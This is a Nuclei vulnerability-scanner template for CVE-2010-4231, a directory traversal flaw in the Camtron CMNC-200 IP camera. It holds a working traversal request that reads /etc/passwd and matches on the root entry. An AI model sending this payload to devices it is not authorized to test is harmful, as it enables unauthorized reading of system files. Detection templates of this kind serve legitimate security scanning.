my-nuclei-templates/CVE-2010-4231.yaml

34 lines
958 B
YAML
Executable File

id: CVE-2010-4231
info:
name: Camtron CMNC-200 IP Camera - Directory Traversal
author: daffainfo
severity: high
description: The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2010-4231
- https://www.exploit-db.com/exploits/15505
- https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt
- http://www.exploit-db.com/exploits/15505/
remediation: Upgrade to a supported product version.
classification:
cve-id: CVE-2010-4231
tags: cve,cve2010,iot,lfi,camera
requests:
- method: GET
path:
- "{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/17